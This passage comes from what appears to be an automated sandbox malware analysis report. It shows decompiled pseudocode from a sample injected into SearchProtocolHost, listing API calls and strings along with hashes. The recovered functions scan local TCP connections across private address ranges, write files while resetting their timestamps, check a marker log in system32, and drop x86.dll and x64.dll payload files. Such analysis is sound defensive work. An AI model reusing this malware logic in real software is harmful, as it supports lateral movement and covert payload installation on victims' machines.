                                                													_t164 =  *_t229;
                                                													_t229 = _t229 + 1;
                                                													__eflags = _t164;
                                                												} while (_t164 != 0);
                                                												_t230 = _t229 - _t246;
                                                												__eflags = _t230;
                                                												L38:
                                                												_push(_t230);
                                                												_push( &_v148);
                                                												E02FA5A00(_t218,  &_v172, _t250, _t253);
                                                												_v8 = 0;
                                                												_t251 =  *0x2fd6a54;
                                                												_t168 = _v224 | 0x00000001;
                                                												_v224 = _t168;
                                                												_v236 = _t168;
                                                												_t256 = E02FA64B0( &_v172,  &_v172);
                                                												_t171 =  *0x2fd6a54;
                                                												__eflags = _t256 - _t171;
                                                												if(_t256 == _t171) {
                                                													L48:
                                                													_t253 = _t171;
                                                													L49:
                                                													__eflags = _t253 - _t251;
                                                													if(_t253 == _t251) {
                                                														_t250 = GetTickCount;
                                                														L58:
                                                														_t219 = 1;
                                                														L59:
                                                														_t232 = _v224;
                                                														__eflags = _t232 & 0x00000002;
                                                														if((_t232 & 0x00000002) != 0) {
                                                															_t186 = _v176;
                                                															_t232 = _t232 & 0xfffffffd;
                                                															_v224 = _t232;
                                                															__eflags = _t186 - 0x10;
                                                															if(_t186 >= 0x10) {
                                                																__eflags = _t186 + 1;
                                                																E02FA5CF0(_t219, _t246, _t250, _v196, _t186 + 1);
                                                																_t232 = _v224;
                                                															}
                                                															_v176 = 0xf;
                                                															_v180 = 0;
                                                															_v196 = 0;
                                                														}
                                                														_v8 = 0xffffffff;
                                                														__eflags = _t232 & 0x00000001;
                                                														if((_t232 & 0x00000001) != 0) {
                                                															_t183 = _v152;
                                                															_v224 = _t232 & 0xfffffffe;
                                                															__eflags = _t183 - 0x10;
                                                															if(_t183 >= 0x10) {
                                                																__eflags = _t183 + 1;
                                                																E02FA5CF0(_t219, _t246, _t250, _v172, _t183 + 1);
                                                															}
                                                														}
                                                														__eflags = _t219;
                                                														if(_t219 == 0) {
                                                															goto L75;
                                                														} else {
                                                															__eflags = _v148;
                                                															_v200 = 0xf;
                                                															_v204 = 0;
                                                															_v220 = 0;
                                                															if(_v148 != 0) {
                                                																_t172 =  &_v148;
                                                																_t105 = _t172 + 1; // 0x1
                                                																_t247 = _t105;
                                                																do {
                                                																	_t233 =  *_t172;
                                                																	_t172 = _t172 + 1;
                                                																	__eflags = _t233;
                                                																} while (_t233 != 0);
                                                																_t173 = _t172 - _t247;
                                                																__eflags = _t173;
                                                																L72:
                                                																_push(_t173);
                                                																_push( &_v148);
                                                																E02FA5A00(_t219,  &_v220, _t250, _t253);
                                                																_v8 = 2;
                                                																_t253 = E02FA57E0( &_v220,  &_v220);
                                                																 *_t253 = GetTickCount();
                                                																_v8 = 0xffffffff;
                                                																_t179 = _v200;
                                                																__eflags = _t179 - 0x10;
                                                																if(_t179 >= 0x10) {
                                                																	__eflags = _t179 + 1;
                                                																	E02FA5CF0(_t219, _t246, _t250, _v220, _t179 + 1);
                                                																}
                                                																_t246 = 0;
                                                																__eflags = 0;
                                                																_v200 = 0xf;
                                                																_v204 = 0;
                                                																_v220 = 0;
                                                																E02FAB4E0(_t219,  &_v248, 0, _t250, 1);
                                                																_t260 = _t260 + 4;
                                                																goto L75;
                                                															}
                                                															_t173 = 0;
                                                															goto L72;
                                                														}
                                                													}
                                                													__eflags = _v148;
                                                													_v176 = 0xf;
                                                													_v180 = 0;
                                                													_v196 = 0;
                                                													if(_v148 != 0) {
                                                														_t237 =  &_v148;
                                                														_t76 = _t237 + 1; // 0x1
                                                														_t246 = _t76;
                                                														do {
                                                															_t189 =  *_t237;
                                                															_t237 = _t237 + 1;
                                                															__eflags = _t189;
                                                														} while (_t189 != 0);
                                                														_t238 = _t237 - _t246;
                                                														__eflags = _t238;
                                                														L55:
                                                														_push(_t238);
                                                														_push( &_v148);
                                                														E02FA5A00(_t218,  &_v196, _t251, _t253);
                                                														_v8 = 1;
                                                														_t193 = _v224 | 0x00000002;
                                                														_v224 = _t193;
                                                														_v236 = _t193;
                                                														_t195 = E02FA57E0( &_v196,  &_v196);
                                                														_t250 = GetTickCount;
                                                														_t253 = _t195;
                                                														_t196 = GetTickCount();
                                                														__eflags = _t196 -  *_t253 - 0x493e0;
                                                														if(_t196 -  *_t253 > 0x493e0) {
                                                															goto L58;
                                                														}
                                                														_t219 = 0;
                                                														goto L59;
                                                													}
                                                													_t238 = 0;
                                                													goto L55;
                                                												}
                                                												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
                                                												_t59 = _t256 + 0x10; // 0x10
                                                												_t246 = _t59;
                                                												_t218 =  *(_t246 + 0x10);
                                                												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
                                                													_t246 =  *_t246;
                                                												}
                                                												__eflags = _v152 - 0x10;
                                                												_t241 =  >=  ? _v172 :  &_v172;
                                                												__eflags = _v156 - _t218;
                                                												_t199 =  <  ? _v156 : _t218;
                                                												_t200 = E02FA51A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
                                                												_t260 = _t260 + 4;
                                                												__eflags = _t200;
                                                												if(__eflags == 0) {
                                                													_t242 = _v156;
                                                													__eflags = _t242 - _t218;
                                                													if(_t242 >= _t218) {
                                                														__eflags = _t242 - _t218;
                                                														_t68 = _t242 != _t218;
                                                														__eflags = _t68;
                                                														_t200 = 0 | _t68;
                                                													} else {
                                                														_t200 = _t200 | 0xffffffff;
                                                													}
                                                													__eflags = _t200;
                                                												}
                                                												if(__eflags == 0) {
                                                													goto L49;
                                                												} else {
                                                													_t171 =  *0x2fd6a54;
                                                													goto L48;
                                                												}
                                                											}
                                                											_t230 = 0;
                                                											goto L38;
                                                										}
                                                									}
                                                									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
                                                									_t29 = _t255 + 0x10; // 0x10
                                                									_t246 = _t29;
                                                									_t217 =  *(_t246 + 0x10);
                                                									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
                                                										_t246 =  *_t246;
                                                									}
                                                									__eflags = _v152 - 0x10;
                                                									_t244 =  >=  ? _v172 :  &_v172;
                                                									__eflags = _v156 - _t217;
                                                									_t206 =  <  ? _v156 : _t217;
                                                									_t207 = E02FA51A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
                                                									_t260 = _t260 + 4;
                                                									__eflags = _t207;
                                                									if(__eflags == 0) {
                                                										_t245 = _v156;
                                                										__eflags = _t245 - _t217;
                                                										if(_t245 >= _t217) {
                                                											__eflags = _t245 - _t217;
                                                											_t38 = _t245 != _t217;
                                                											__eflags = _t38;
                                                											_t207 = 0 | _t38;
                                                										} else {
                                                											_t207 = _t207 | 0xffffffff;
                                                										}
                                                										__eflags = _t207;
                                                									}
                                                									if(__eflags == 0) {
                                                										goto L30;
                                                									} else {
                                                										_t160 =  *0x2fd6a8c;
                                                										goto L29;
                                                									}
                                                								}
                                                								_t226 = 0;
                                                								goto L19;
                                                							}
                                                							if(_t217 != 0xac) {
                                                								__eflags = _t217 - 0xc0;
                                                								if(_t217 != 0xc0) {
                                                									goto L75;
                                                								}
                                                								__eflags = _t217 - 0xa8;
                                                								if(_t217 != 0xa8) {
                                                									goto L75;
                                                								}
                                                								goto L14;
                                                							}
                                                							if(_t217 < 0x10) {
                                                								goto L75;
                                                							}
                                                							if(_t217 <= 0x1f) {
                                                								goto L14;
                                                							}
                                                							L75:
                                                							_t215 = _v232;
                                                							_t163 = _v240 + 1;
                                                							_t224 =  &(_v244[5]);
                                                							_v240 = _t163;
                                                							_v244 = _t224;
                                                						} while (_t163 <  *_t215);
                                                						_t253 = GetProcessHeap;
                                                						_t250 = HeapFree;
                                                						goto L77;
                                                					}
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
                                                					_v232 = _t215;
                                                					if(_t215 == 0) {
                                                						goto L80;
                                                					}
                                                					goto L4;
                                                					L77:
                                                					HeapFree(GetProcessHeap(), 0, _t215);
                                                					Sleep(0x1388);
                                                					_v228 = 0;
                                                					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
                                                					_t215 = _t143;
                                                					_v232 = _t143;
                                                				} while (_t215 != 0);
                                                				goto L80;
                                                			}
                                                0x02fa55a7
                                                0x02fa55a8
                                                0x02fa55a8
                                                0x02fa55ac
                                                0x02fa55ac
                                                0x02fa55ae
                                                0x02fa55ae
                                                0x02fa55b5
                                                0x02fa55bc
                                                0x02fa55c1
                                                0x02fa55ce
                                                0x02fa55d1
                                                0x02fa55d7
                                                0x02fa55e4
                                                0x02fa55e9
                                                0x02fa55ef
                                                0x02fa55f1
                                                0x02fa55f5
                                                0x02fa55fa
                                                0x00000000
                                                0x00000000
                                                0x02fa55fc
                                                0x00000000
                                                0x02fa55fc
                                                0x02fa5598
                                                0x00000000
                                                0x02fa5598
                                                0x02fa5508
                                                0x02fa550c
                                                0x02fa550c
                                                0x02fa550f
                                                0x02fa5512
                                                0x02fa5514
                                                0x02fa5514
                                                0x02fa5516
                                                0x02fa5525
                                                0x02fa552c
                                                0x02fa5532
                                                0x02fa553a
                                                0x02fa553f
                                                0x02fa5542
                                                0x02fa5544
                                                0x02fa5546
                                                0x02fa554c
                                                0x02fa554e
                                                0x02fa5557
                                                0x02fa5559
                                                0x02fa5559
                                                0x02fa5559
                                                0x02fa5550
                                                0x02fa5550
                                                0x02fa5550
                                                0x02fa555c
                                                0x02fa555c
                                                0x02fa5563
                                                0x00000000
                                                0x02fa5565
                                                0x02fa5565
                                                0x00000000
                                                0x02fa5565
                                                0x02fa5563
                                                0x02fa54a6
                                                0x00000000
                                                0x02fa54a6
                                                0x02fa547c
                                                0x02fa53f9
                                                0x02fa53fd
                                                0x02fa53fd
                                                0x02fa5400
                                                0x02fa5403
                                                0x02fa5405
                                                0x02fa5405
                                                0x02fa5407
                                                0x02fa5416
                                                0x02fa541d
                                                0x02fa5423
                                                0x02fa542b
                                                0x02fa5430
                                                0x02fa5433
                                                0x02fa5435
                                                0x02fa5437
                                                0x02fa543d
                                                0x02fa543f
                                                0x02fa5448
                                                0x02fa544a
                                                0x02fa544a
                                                0x02fa544a
                                                0x02fa5441
                                                0x02fa5441
                                                0x02fa5441
                                                0x02fa544d
                                                0x02fa544d
                                                0x02fa5454
                                                0x00000000
                                                0x02fa5456
                                                0x02fa5456
                                                0x00000000
                                                0x02fa5456
                                                0x02fa5454
                                                0x02fa53ad
                                                0x00000000
                                                0x02fa53ad
                                                0x02fa5362
                                                0x02fa5377
                                                0x02fa537a
                                                0x00000000
                                                0x00000000
                                                0x02fa5380
                                                0x02fa5383
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa5383
                                                0x02fa5367
                                                0x00000000
                                                0x00000000
                                                0x02fa5370
                                                0x00000000
                                                0x00000000
                                                0x02fa5741
                                                0x02fa5747
                                                0x02fa574d
                                                0x02fa5754
                                                0x02fa5757
                                                0x02fa575d
                                                0x02fa5763
                                                0x02fa576b
                                                0x02fa5771
                                                0x00000000
                                                0x02fa5771
                                                0x02fa52b5
                                                0x02fa52c8
                                                0x02fa52ca
                                                0x02fa52d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa5777
                                                0x02fa577d
                                                0x02fa5784
                                                0x02fa578e
                                                0x02fa579b
                                                0x02fa57a1
                                                0x02fa57a3
                                                0x02fa57a9
                                                0x00000000

                                                APIs
                                                • Sleep.KERNELBASE(00001388,93AD1EEA), ref: 02FA5241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA5271
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA5274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 02FA52A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA52B2
                                                • HeapFree.KERNEL32(00000000), ref: 02FA52B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA52BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA52C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 02FA52E2
                                                • GetTickCount.KERNEL32 ref: 02FA55F1
                                                • GetTickCount.KERNEL32 ref: 02FA56F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA577A
                                                • HeapFree.KERNEL32(00000000), ref: 02FA577D
                                                • Sleep.KERNEL32(00001388), ref: 02FA5784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02FA5798
                                                • HeapAlloc.KERNEL32(00000000), ref: 02FA579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02FA57B6
                                                • HeapFree.KERNEL32(00000000), ref: 02FA57B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 4207308331-3742512694
                                                • Opcode ID: 95b779d96688d0c7434a474be4ecf12dca9b4fb8252706d214b2f9fc72daf83d
                                                • Instruction ID: bdd89f85aacc21f37a281d6756d211b3d7f088c111723654ffd9e286e5803a68
                                                • Opcode Fuzzy Hash: 95b779d96688d0c7434a474be4ecf12dca9b4fb8252706d214b2f9fc72daf83d
                                                • Instruction Fuzzy Hash: 90F1A0B0E40319DFEB20DF64CCA4BA9B7B5BB01394F9445D9D64EA7281DB709A88CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function 2fafc10 (nodes marked Executed / Not Executed)
                                                C-Code - Quality: 84%
                                                			E02FAFC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				char _v267;
                                                				char _v268;
                                                				char _v528;
                                                				struct _FILETIME _v544;
                                                				struct _FILETIME _v552;
                                                				struct _FILETIME _v560;
                                                				long _v564;
                                                				char _v828;
                                                				char _v829;
                                                				struct _OVERLAPPED* _v836;
                                                				long _v840;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t80;
                                                				char _t81;
                                                				void* _t83;
                                                				signed int _t91;
                                                				void* _t97;
                                                				long _t100;
                                                				signed int _t110;
                                                				void* _t111;
                                                				signed int _t120;
                                                				signed int _t125;
                                                				signed int _t127;
                                                				signed int* _t133;
                                                				signed int _t134;
                                                				void* _t136;
                                                				intOrPtr _t142;
                                                				signed int* _t144;
                                                				signed int* _t145;
                                                				signed int _t148;
                                                				signed int* _t156;
                                                				signed int* _t167;
                                                				signed int* _t174;
                                                				signed int _t175;
                                                				void* _t181;
                                                				signed int _t183;
                                                				signed int* _t184;
                                                				long _t186;
                                                				void* _t187;
                                                				void* _t188;
                                                				void* _t189;
                                                				signed int _t190;
                                                				signed int _t192;
                                                				signed int _t197;
                                                				void* _t198;
                                                				void* _t200;
                                                
                                                				_t166 = __edx;
                                                				_t192 = _t197;
                                                				_t198 = _t197 - 0x344;
                                                				_t74 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t74 ^ _t192;
                                                				_t133 = _a8;
                                                				_t174 = __ecx;
                                                				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					E02FAF2D0( *((intOrPtr*)(__ecx)), __edx);
                                                				}
                                                				_t76 =  *_t174;
                                                				_t142 = _a4;
                                                				_t174[1] = 0xffffffff;
                                                				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
                                                					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
                                                					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
                                                						E02FAEC60(_t76);
                                                						_t142 = _a4;
                                                					}
                                                					_t77 =  *_t174;
                                                					_push(_t181);
                                                					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
                                                					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
                                                						do {
                                                							_t190 =  *_t174;
                                                							__eflags = _t190;
                                                							if(_t190 != 0) {
                                                								__eflags =  *(_t190 + 0x18);
                                                								if( *(_t190 + 0x18) != 0) {
                                                									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
                                                									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
                                                									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
                                                										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
                                                										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
                                                										_t20 = _t190 + 0x28; // 0x28
                                                										_t166 = _t20;
                                                										_t21 = _t190 + 0x78; // 0x78
                                                										_t125 = E02FAE7C0(_t190, _t20, _t21, 0, 0);
                                                										_t142 = _a4;
                                                										_t198 = _t198 - 0x10 + 0x1c;
                                                										asm("sbb eax, eax");
                                                										_t127 =  ~_t125 + 1;
                                                										__eflags = _t127;
                                                										 *(_t190 + 0x18) = _t127;
                                                									}
                                                								}
                                                							}
                                                							_t120 =  *_t174;
                                                							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
                                                						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
                                                					}
                                                					E02FAF4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
                                                					__eflags = _v564 & 0x00000010;
                                                					_t80 =  *_t133;
                                                					if((_v564 & 0x00000010) == 0) {
                                                						_t167 = _t133;
                                                						_t144 = _t133;
                                                						__eflags = _t80;
                                                						while(_t80 != 0) {
                                                							__eflags = _t80 - 0x2f;
                                                							if(_t80 == 0x2f) {
                                                								L23:
                                                								_t32 =  &(_t144[0]); // 0x2fa5105
                                                								_t167 = _t32;
                                                							} else {
                                                								__eflags = _t80 - 0x5c;
                                                								if(_t80 == 0x5c) {
                                                									goto L23;
                                                								}
                                                							}
                                                							_t33 =  &(_t144[0]); // 0x2fd6a4c
                                                							_t80 =  *_t33;
                                                							_t144 =  &(_t144[0]);
                                                							__eflags = _t80;
                                                						}
                                                						_t145 = _t133;
                                                						_t183 =  &_v268 - _t133;
                                                						__eflags = _t183;
                                                						do {
                                                							_t81 =  *_t145;
                                                							_t35 =  &(_t145[0]); // 0x2fd6a4c
                                                							_t145 = _t35;
                                                							 *((char*)(_t183 + _t145 - 1)) = _t81;
                                                							__eflags = _t81;
                                                						} while (_t81 != 0);
                                                						__eflags = _t167 - _t133;
                                                						if(_t167 != _t133) {
                                                							_t83 = _t167 - _t133;
                                                							__eflags = _t83 - 0x104;
                                                							if(_t83 >= 0x104) {
                                                								E02FB0E90();
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_push(_t183);
                                                								_t184 = _t145;
                                                								_push(_t174);
                                                								__eflags = _t184[1] - 0xffffffff;
                                                								if(_t184[1] != 0xffffffff) {
                                                									E02FAF2D0( *_t184, _t167);
                                                								}
                                                								_t175 =  *_t184;
                                                								_t184[1] = 0xffffffff;
                                                								__eflags = _t175;
                                                								if(_t175 != 0) {
                                                									__eflags =  *(_t175 + 0x7c);
                                                									if( *(_t175 + 0x7c) != 0) {
                                                										E02FAF2D0(_t175, _t167);
                                                									}
                                                									_push(_t133);
                                                									_t134 =  *_t175;
                                                									__eflags = _t134;
                                                									if(_t134 != 0) {
                                                										__eflags =  *((char*)(_t134 + 0x10));
                                                										if( *((char*)(_t134 + 0x10)) != 0) {
                                                											CloseHandle( *(_t134 + 4));
                                                										}
                                                										_push(0x20);
                                                										E02FB0AA1(_t134);
                                                										_t198 = _t198 + 8;
                                                									}
                                                									L02FB5A36(_t175);
                                                								}
                                                								__eflags = 0;
                                                								 *_t184 = 0;
                                                								return 0;
                                                							} else {
                                                								 *((char*)(_t192 + _t83 - 0x108)) = 0;
                                                								_t91 = _v268;
                                                								__eflags = _t91 - 0x2f;
                                                								if(_t91 == 0x2f) {
                                                									L35:
                                                									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
                                                									_t200 = _t198 + 0x10;
                                                									_t148 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									__eflags = _t91 - 0x5c;
                                                									if(_t91 == 0x5c) {
                                                										goto L35;
                                                									} else {
                                                										__eflags = _t91;
                                                										if(_t91 == 0) {
                                                											goto L34;
                                                										} else {
                                                											__eflags = _v267 - 0x3a;
                                                											if(_v267 == 0x3a) {
                                                												goto L35;
                                                											} else {
                                                												goto L34;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L36;
                                                							}
                                                						} else {
                                                							_v268 = _t81;
                                                							L34:
                                                							_t183 =  &(_t174[0x50]);
                                                							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
                                                							_t200 = _t198 + 0x14;
                                                							_t148 = _t183;
                                                							L36:
                                                							E02FAFB00(_t148,  &_v268); // executed
                                                							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
                                                							_t136 = _t97;
                                                							__eflags = _t136 - 0xffffffff;
                                                							if(_t136 != 0xffffffff) {
                                                								E02FAEF10( *_t174, _t174[0x4e]); // executed
                                                								__eflags = _t174[0x4f];
                                                								if(__eflags == 0) {
                                                									_push(0x4000); // executed
                                                									_t111 = E02FB0AB4(_t183, __eflags); // executed
                                                									_t200 = _t200 + 4;
                                                									_t174[0x4f] = _t111;
                                                								}
                                                								_v836 = 0;
                                                								while(1) {
                                                									_t170 = _t174[0x4f];
                                                									_t100 = E02FAF090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
                                                									_t186 = _t100;
                                                									_t200 = _t200 + 8;
                                                									__eflags = _t186 - 0xffffff96;
                                                									if(_t186 == 0xffffff96) {
                                                										break;
                                                									}
                                                									__eflags = _t186;
                                                									if(__eflags < 0) {
                                                										L47:
                                                										_v836 = 0x5000000;
                                                									} else {
                                                										if(__eflags <= 0) {
                                                											L45:
                                                											__eflags = _v829;
                                                											if(_v829 != 0) {
                                                												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
                                                											} else {
                                                												__eflags = _t186;
                                                												if(_t186 != 0) {
                                                													continue;
                                                												} else {
                                                													goto L47;
                                                												}
                                                											}
                                                										} else {
                                                											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
                                                											__eflags = _t110;
                                                											if(_t110 == 0) {
                                                												_v836 = 0x400;
                                                											} else {
                                                												goto L45;
                                                											}
                                                										}
                                                									}
                                                									L51:
                                                									FindCloseChangeNotification(_t136); // executed
                                                									E02FAF2D0( *_t174, _t170);
                                                									__eflags = _v8 ^ _t192;
                                                									_pop(_t187);
                                                									return E02FB0A5D(_v8 ^ _t192, _t187);
                                                									goto L64;
                                                								}
                                                								_v836 = 0x1000;
                                                								goto L51;
                                                							} else {
                                                								_pop(_t188);
                                                								__eflags = _v8 ^ _t192;
                                                								return E02FB0A5D(_v8 ^ _t192, _t188);
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t80 - 0x2f;
                                                						if(_t80 == 0x2f) {
                                                							L18:
                                                							_t156 = 0;
                                                							__eflags = 0;
                                                						} else {
                                                							__eflags = _t80 - 0x5c;
                                                							if(_t80 == 0x5c) {
                                                								goto L18;
                                                							} else {
                                                								__eflags = _t80;
                                                								if(_t80 == 0) {
                                                									L17:
                                                									_t156 =  &(_t174[0x50]);
                                                								} else {
                                                									__eflags = _t133[0] - 0x3a;
                                                									if(_t133[0] == 0x3a) {
                                                										goto L18;
                                                									} else {
                                                										goto L17;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						E02FAFB00(_t156, _t133);
                                                						_pop(_t189);
                                                						__eflags = _v8 ^ _t192;
                                                						return E02FB0A5D(_v8 ^ _t192, _t189);
                                                					}
                                                				} else {
                                                					return E02FB0A5D(_v8 ^ _t192, _t181);
                                                				}
                                                				L64:
                                                			}
























































                                                APIs
                                                • wsprintfA.USER32 ref: 02FAFDA6
                                                • wsprintfA.USER32 ref: 02FAFDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 02FAFDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 02FAFE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 02FAFECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FAFEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$:
                                                • API String ID: 2340708895-3034790606
                                                • Opcode ID: 70e0fae62b9d2ca91548b42f5ae7dd9a0e48d8650439c48c6a21f871184c86c2
                                                • Instruction ID: 8a4bad33b67e1a20a6e918354170647e7781c161e6b2584d514d806d1b324d24
                                                • Opcode Fuzzy Hash: 70e0fae62b9d2ca91548b42f5ae7dd9a0e48d8650439c48c6a21f871184c86c2
                                                • Instruction Fuzzy Hash: AB9110B1A002089BCB35DF24CCA4BE9F3B5AF05354F104799DB5A9F681D7726A85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E02FA6FE0(void* __ebx, CHAR* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void* __esi;
                                                				signed int _t17;
                                                				void* _t23;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t42;
                                                				CHAR* _t59;
                                                				signed int _t60;
                                                
                                                				_t58 = __edi;
                                                				_t17 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t17 ^ _t60;
                                                				_t59 = __ecx;
                                                				E02FB3440(__edi,  &_v268, 0, 0x104);
                                                				_push("Diagnostics.txt");
                                                				E02FA5180( &_v268, 0x104, "%s\%s", _t59);
                                                				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
                                                				_t66 = _t23 - 0xffffffff;
                                                				if(_t23 == 0xffffffff) {
                                                					L5:
                                                					__eflags = _v8 ^ _t60;
                                                					return E02FB0A5D(_v8 ^ _t60, _t59);
                                                				} else {
                                                					FindCloseChangeNotification(_t23); // executed
                                                					CreateDirectoryA(_t59, 0); // executed
                                                					_t29 = E02FA7140(_t66,  &_v268); // executed
                                                					_t67 = _t29;
                                                					if(_t29 == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t30 = E02FA5010(__ebx, _t59, _t58, _t67); // executed
                                                						_t68 = _t30;
                                                						if(_t30 == 0) {
                                                							goto L5;
                                                						} else {
                                                							DeleteFileA( &_v268);
                                                							E02FB3440(_t58,  &_v528, 0, 0x104);
                                                							E02FB3440(_t58,  &_v788, 0, 0x104);
                                                							E02FA5180( &_v528, 0x104, "%s\\x86.dll", _t59);
                                                							E02FA5180( &_v788, 0x104, "%s\\x64.dll", _t59);
                                                							_t42 = E02FA7140(_t68,  &_v528);
                                                							_t69 = _t42;
                                                							if(_t42 == 0) {
                                                								goto L5;
                                                							} else {
                                                								E02FA7140(_t69,  &_v788);
                                                								return E02FB0A5D(_v8 ^ _t60, _t59);
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02FA703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02FA704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 02FA7055
                                                • DeleteFileA.KERNEL32(?), ref: 02FA7093
                                                  • Part of subcall function 02FA7140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 02FA718D
                                                  • Part of subcall function 02FA7140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02FA71A5
                                                  • Part of subcall function 02FA7140: CloseHandle.KERNEL32(00000000,?,?), ref: 02FA71B0
                                                  • Part of subcall function 02FA7140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 02FA71BE
                                                  • Part of subcall function 02FA7140: LocalFree.KERNELBASE(00000000,?,?), ref: 02FA71C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-1068396467
                                                • Opcode ID: 7301b0e229b1277328c79b2b82ff5b3c8bd28afac9457721d05c885c34620c4b
                                                • Instruction ID: de5d893ac106088fa3551f267f93bffe63b4d5f703b15147ed60e2395d96ac26
                                                • Opcode Fuzzy Hash: 7301b0e229b1277328c79b2b82ff5b3c8bd28afac9457721d05c885c34620c4b
                                                • Instruction Fuzzy Hash: 2531B7F0E80318A7FA20F761DD56FDEB36D9F05794F5004E5B799BB1C0DAB0A6848A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
